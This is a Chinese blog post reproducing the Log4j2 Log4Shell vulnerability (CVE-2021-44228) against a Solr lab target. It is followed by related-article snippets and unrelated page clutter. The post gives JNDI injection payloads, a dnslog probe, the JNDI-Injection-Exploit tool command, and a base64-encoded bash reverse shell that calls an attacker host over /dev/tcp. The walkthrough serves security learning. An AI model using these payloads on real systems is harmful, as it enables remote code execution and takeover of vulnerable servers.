Log4j2:CVE-2021-44228漏洞复现

最新推荐文章于 2026-01-05 13:24:23 发布
原创 最新推荐文章于 2026-01-05 13:24:23 发布 · 247 阅读 · 6 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#log4j

Apache Log4j 是 Apache 的一个开源项目,Apache Log4j2是一个基于Java的日志记录工具。该工具重写了Log4j框架,并且引入了大量丰富的特性。我们可以控制日志信息输送的目的地为控制台、文件、GUI组件等,通过定义每一条日志信息的级别,能够更加细致地控制日志的生成过程。该日志框架被大量用于业务系统开发,用来记录日志信息。

访问靶场

121.40.158.60:8983/solr/admin/cores?action=1

漏洞判定

利用dnslog

首先访问dnslog获取一个临时域名

然后利用获取到的临时域名构造payload ,直接访问

http://121.40.158.60:8983/solr/admin/cores?action=${jndi:ldap://s98m2z.dnslog.cn}
出现访问记录

漏洞利用

使用kali虚拟机下载JDNI注入工具

构造payload

并base64编码------ bash -i > /dev/tcp/192.168.192.128/6969 0>&1

在kali执行:

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C bash -c " {echo,YmFzaCAtaSA+IC9kZXYvdGNwLzE5Mi4xNjguMTkyLjEyOC82OTY5IDA+JjE=}|{base64,-d}|{bash,-i}" -A 192.168.192.128

得到了rmi、ldap参数

监听端口

在浏览器访问payload

121.40.158.60:8983/solr/admin/cores?action=${jndi:rmi://192.168.192.128:1099/wvsnvm}

发现kali这边监听到了,可以执行shell命令

完成

Paper_F1nd
关注
vulhub log4j2 CVE-2021-44228漏洞复现
qq_65852138的博客
09-08 470
vulhub log4j2 CVE-2021-44228漏洞复现
复现apache log4j2(CVE-2021-44228)漏洞
AmeV_ll的博客
03-30 296
JNDI (Java Naming and Directory Interface) 是一组应用程序接口,它为开发人员查找和访问各种资源提供了统一的通用接口,可以用来定位用户、网络、机器、对象和服务等各种资源。JNDI底层支持RMI远程对象,RMI注册的服务可以通过JNDI接口来访问和调用。JNDI接口在初始化时,可以将RMI URL作为参数传入,而JNDI注入就出现在客户端的lookup()函数中,如果lookup()的参数可控就可能被攻击,导致日志在记录用户输入地数据时,触发了注入漏洞,该漏洞可导致远程
【vulhub】Log4j2CVE-2021-44228漏洞复现
weixin_49422491的博客
09-13 4222
【vulhub】Log4j2CVE-2021-44228漏洞复现
vulhub复现CVE-2021-44228log4j漏洞
weixin_48878440的博客
12-12 1543
vulhub复现cve-2021-44228 log4j漏洞
Log4j CVE-2021-44228 漏洞复现详细教程
2201_75617121的博客
07-23 601
摘要:本文介绍了利用Log4j漏洞(CVE-2021-44228)进行攻击的完整过程。首先通过vulhub搭建漏洞环境,使用dnslog.cn验证漏洞存在。然后利用JNDI-Injection-Exploit工具生成恶意LDAP链接,构造包含base64编码反弹shell的命令。最后通过漏洞触发点执行命令,成功获取目标shell权限。文中详细说明了从环境搭建、漏洞验证到最终利用的全套流程,包括必要的编码转换和监听设置。
Log4j(CVE-2021-44228)漏洞复现及可能出现的复现问题
2301_78611138的博客
08-06 1780
log4j2是 Apache 开源的一个高性能 Java 日志框架,广泛用于企业级应用开发中,其主要功能是记录程序运行过程中的调试信息、错误日志、访问日志等。JNDI(Java Naming and Directory Interface) 是 Java 提供的一套 API,用于查找和访问命名与目录服务(如 LDAP、RMI、DNS)。攻击者可以利用 JNDI 加载远程的 Java 类(.class文件),并由目标 JVM 自动加载执行。
Log4j 2 (CVE-2021-44228)漏洞复现
Pluto.的博客
11-21 733
Log4j 2 (CVE-2021-44228)漏洞复现
CVE-2021-44228漏洞log4j漏洞复现
THZLYXX的博客
11-11 940
1.vulhub靶场启动,进入目录/home/vulhub-master/log4j/CVE-2021-44228/5.使用JNDI-Injection-Exploit-1.0-SNAPSHOT-all注入工具生成可用payload。1.下载JNDI-Injection-Exploit-1.0-SNAPSHOT-all工具进行漏洞利用。6.使用bp进行抓包,将工具生成的payload替换到语句中,并对其进行URL编码。2.对执行的命令进行加密bash64进行加密。3.使用burp进行bash64编码。
log4j漏洞复现CVE-2021-44228
qq_42699326的博客
11-26 1138
Log4j 2 是 Apache 基金会开发的一个广泛使用的 Java 日志记录库。CVE-2021-44228 是一个严重的远程代码执行(RCE)漏洞,也被称为 Log4Shell。该漏洞允许攻击者通过构造特定的日志消息来远程执行任意代码。
log4j2 CVE-2021-44228漏洞复现
qq_14902381的博客
08-10 951
vulfocus靶场log4j2 漏洞CVE-2021-44228复现
C 标准库 - `<assert.h>`
wjs2024的博客
12-31 267
assert.h>:当expr为假时,打印错误信息并终止程序执行。:当expr为假时,在编译时打印错误信息。以下是一个使用assertint a = 10;int b = 5;// 断言a大于bprintf("程序继续执行。\n");return 0;运行上述代码时,由于a > b为真,程序将正常执行并打印“程序继续执行。<assert.h>头文件为C语言开发者提供了一种强大的工具——断言。通过使用断言,可以有效地检查代码中的错误,提高代码质量和可靠性。
阿里Java面试被问:单元测试的最佳实践
2501_94505843的博客
01-04 623
本文系统介绍了软件测试的最佳实践,主要包含以下内容:1. 测试金字塔原则,推荐70%单元测试+20%集成测试+10%端到端测试的比例;2. 测试代码质量标准,包括命名规范、AAA模式等;3. Mock与Stub的使用场景和区别;4. 测试数据管理策略;5. 断言最佳实践;6. 测试隔离与可重复性;7. 测试性能与维护建议;8. 边界条件测试方法;9. 有意义的测试覆盖率目标;10. TDD开发流程。文章提供了大量代码示例,并总结了单元测试检查清单和测试金字塔指导原则,强调应重点关注业务逻辑、复杂算法和边界条
八周Python强化计划(八)
mysterious_z的博客
01-05 481
本文介绍了Python项目优化的关键实践,包括日志记录、单元测试、调试技巧和代码规范。主要内容有: 使用logging模块替代print实现分级日志输出 通过assert编写简单测试验证代码逻辑 演示三种调试方法:print调试、日志调试和IDE断点调试 介绍PEP8代码规范及自动检查工具 提供Python不同发展方向的学习路线建议 文章还包含项目实战示例,如增强代码健壮性、支持结果输出到文件等功能优化。最后强调通过完善项目并上传GitHub来巩固学习成果,建议学习者选择一个具体方向进行深入实践。
2.6 测试
大B哥要搞艺术
01-04 639
模拟用户操作路径(如 Web 页面点击、API 调用链),验证系统整体功能。适合验证核心业务流程(如用户注册 - 登录 - 下单),但需控制用例数量(执行耗时较长)。在 Python 开发中,测试不仅是 "找 Bug" 的手段,更是保障代码质量、降低维护成本的核心工程实践。当单元测试通过后,需验证模块间交互(如 API 调用、数据库操作、第三方服务依赖)。:优先选择 pytest,语法简洁、扩展性强,是 Python 社区主流测试框架。),包含用户注册、登录功能,依赖数据库操作(丰富插件(参数化、覆盖率)
过长函数(Long Function):坏味道识别与重构实战指南
随心随手随意随记
01-04 887
重构指南:过长函数(Long Function) 摘要:过长函数是常见代码坏味道,指函数体过长、承担过多职责。典型症状包括:超过50行代码、多层嵌套、使用"and"连接多个动作、需要滚动查看完整内容。这种函数导致维护困难、bug风险高、扩展障碍和认知负担。 重构方案: 识别:检查函数是否违反单一职责原则 拆分:将不同逻辑提取为独立小函数(如验证、计算、日志等) 命名:使用描述性函数名明确职责 组合:主函数仅协调各子函数调用
Capture One 23 v16.3安装教程(含安装包)
01-05
Capture One 23 v16.3安装教程(含安装包)
基于OREPA在线重参数化的YOLO26模型优化:目标检测训练效率与精度双提升方法研究
01-05
内容概要:本文介绍了如何通过引入OREPA(在线卷积重参数化)技术优化YOLO26模型的训练效率与检测精度。OREPA在训练阶段采用多分支卷积结构增强特征学习能力,提升收敛速度和精度上限;在推理阶段则将多分支参数融合为单一路由,保持模型轻量化与高效推理。文章详细阐述了OREPA的原理、与传统训练方法的对比,并提供了完整的代码实现路径,包括自定义模块编写、模型结构替换、YAML配置更新及训练验证流程。实验表明,集成OREPA后模型在mAP50和mAP50-95指标上均有显著提升,且训练收敛更快。此外,还提出了多分支调优、行业定制和多任务融合等科研拓展方向。; 使用场景及目标:①解决YOLO模型训练收敛慢、精度提升受限的问题;②在不牺牲推理效率的前提下提升模型性能;③开展基于重参数化的模型结构创新研究; 阅读建议:建议结合提供的代码链接和飞书文档,边实践边学习,重点理解OREPA的训练-推理机制转换,并在实际项目中进行模块替换与性能对比测试,以深入掌握其优化机理。
流程图讲解13.mp4
最新发布
01-05
流程图讲解13.mp4
cve-2021-44228漏洞复现分析
03-03
### CVE-2021-44228 漏洞复现分析 #### Log4j 的介绍 Log4j 是一个广泛使用的Java日志记录库,由Apache软件基金会开发。该库允许开发者通过配置文件灵活控制日志信息的格式、级别以及输出位置。 #### 漏洞概述 CVE-2021-44228是一个存在于Log4j 2.x系列中的严重远程代码执行漏洞。当应用程序使用了受影响版本的日志组件并处理特定模式字符串时,攻击者可以构造恶意输入触发JNDI注入,从而实现任意代码执行或敏感数据泄露[^1]。 #### 复现环境准备 为了安全地研究此漏洞,在隔离环境中搭建测试平台至关重要。通常情况下,这涉及到安装适当的操作系统镜像(如Kali Linux),确保已安装Java Development Kit (JDK),因为目标应用依赖于它来运行。具体来说,对于本案例而言,建议采用JDK 1.8版本[^2]。 #### 构建利用场景 构建模拟攻击的第一步是从GitHub仓库获取专门为此目的设计的工具集——`bkfish/Apache-Log4j-Learning`项目提供了详细的指南和必要的脚本支持。这些资源可以帮助研究人员快速设置好实验条件,并验证不同条件下漏洞的表现形式。 #### 利用方式实例化 一种常见的利用方法是在请求参数中嵌入特殊格式化的字符串表达式`${...}`,其中包含了指向外部LDAP服务器的数据源描述符。例如,向Solr服务发送如下所示的核心管理命令: ```bash http://target/solr/admin/cores?action=${jndi:ldap://${sys:java.version}.ib1ozt.dnslog.cn} ``` 这里`${sys:java.version}`会解析成当前系统的Java版本号作为子域名的一部分传递给DNS查询,以此证明存在潜在的安全风险[^4]。 #### 受影响范围确认 一旦成功触发漏洞,可以通过监控网络流量或者查看响应报文中携带的信息判断是否存在异常行为。比如观察到DNS请求中含有预期之外的内容,则表明可能已经遭受了非法入侵尝试;反之如果没有明显的迹象则说明防护措施有效阻止了威胁的发生。 #### 安全加固建议 针对此类高危级别的零日缺陷,官方及时发布了补丁程序修复问题所在之处。因此强烈推荐用户尽快升级至最新稳定版Log4j以消除隐患。除此之外,还应考虑采取其他辅助性的防御策略,诸如限制对外部资源加载权限、启用严格的输入校验机制等手段进一步增强安全性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值